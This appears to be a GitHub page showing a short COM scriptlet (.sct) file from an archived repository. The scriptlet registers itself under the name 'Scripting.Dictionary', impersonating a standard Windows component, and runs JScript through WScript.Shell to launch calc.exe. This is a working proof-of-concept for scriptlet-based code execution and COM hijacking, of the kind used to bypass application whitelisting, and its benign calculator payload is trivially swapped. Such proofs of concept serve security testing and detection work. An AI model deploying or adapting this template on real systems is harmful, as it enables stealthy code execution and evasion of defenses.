This repository has been archived by the owner. It is now read-only.
Permalink
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="Scripting.Dictionary" | |
progid="Scripting.Dictionary" | |
version="1" | |
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
remotable="true" | |
> | |
</registration> | |
<script language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | |
]]> | |
</script> | |
</scriptlet> |